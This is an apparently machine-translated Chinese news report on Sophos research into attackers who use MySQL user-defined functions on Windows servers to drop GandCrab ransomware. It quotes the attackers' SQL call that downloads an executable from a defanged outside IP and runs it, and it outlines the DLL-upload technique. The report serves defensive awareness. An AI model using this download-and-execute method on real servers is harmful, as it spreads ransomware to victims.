黑客以MySQL数据库为目标，提供GandCrab勒索软件

Sophos的安全专家发现了针对运行MySQL数据库的Windows服务器的攻击浪潮，目的是提供GandCrab 勒索软件

Sophos研究人员观察到针对运行MySQL数据库的Windows服务器的攻击浪潮，威胁行为者旨在提供GandCrab勒索软件。

这是该公司第一次看到黑客攻击运行实例MySQL数据库的Windows服务器，以使用勒索软件感染它们。

专家发现了这些攻击，因为他们击中了公司的蜜罐之一，模仿MySQL在默认的TCP端口3306上监听。

攻击者尝试连接到数据库服务器并确定它正在运行MySQL实例。

然后，攻击者使用“set”命令将组成帮助DLL的所有字节上传到变量的内存中，并将该变量的内容写入名为yongger2的数据库表中  。

攻击者将字节连接成一个文件并将它们放入服务器的插件目录中。对DLL的分析显示它用于将  xpdl3，xpdl3_deinit和  xpdl3_init 函数添加到数据库。

然后攻击者删除yongger2表和函数xpdl3（如果已存在）。此时，攻击者使用以下SQL命令创建用于调用DLL的数据库函数（也称为xpdl3）：

创建功能xpdl3返回字符串’cna12.dll’

调用xpdl3函数的命令是：

select xpdl3（’hxxp：//172.96.14.134：5471 / 3306-1 [。] exe’，’c：\\ isetup.exe’）

使用此攻击方案，攻击者指示数据库服务器从远程计算机下载GandCrab负载，并将其放在名为isetup.exe的C：驱动器的根目录中并执行它。

根据Sophos的说法，至少有一名中国威胁演员目前正在进行此类攻击，扫描互联网以查找运行MySQL数据库的Windows服务器。

“在当地时间中午，即5月19日星期日，这种特殊的攻击只发生了几秒钟。” Sophos发表的分析报告说。

“但文件来源的URL受到一些审查。它指向运行服务器软件的Web服务器上的一个打开目录，名为  HFS，它是一个基于Windows的Web服务器，采用单个应用程序的形式。“

“令人感兴趣的是，这台托管GandCrab样本的机器的IP地址位于美国亚利桑那州沙漠地区的地理位置，而且该机器上HFS安装的用户界面是简体中文版。”

对服务器的分析允许专家确定勒索软件的下载次数。

针对蜜罐的GandCrab样本下载次数超过500次。不幸的是，样本并不是唯一的，计算在一起，专家估计在五天内已经有近800次下载，以及在开放目录中超过2300次下载其他GandCrab样本。

“服务器似乎表明我看到MySQL蜜罐下载（3306-1.exe）的样本下载次数超过500次。但是，名为3306-2.exe，3306-3.exe和3306-4.exe的示例与该文件完全相同，“继续分析。

“计算在一起，自从他们被放置在这台服务器上的五天内，已有近800次下载，以及在开放目录中超过2300次下载其他（大约一周之前）的GandCrab示例。

研究人员指出，这不是一次大规模或广泛的攻击，无论如何，它对MySQL服务器管理员来说是一个严重的风险，他们在线暴露他们的安装。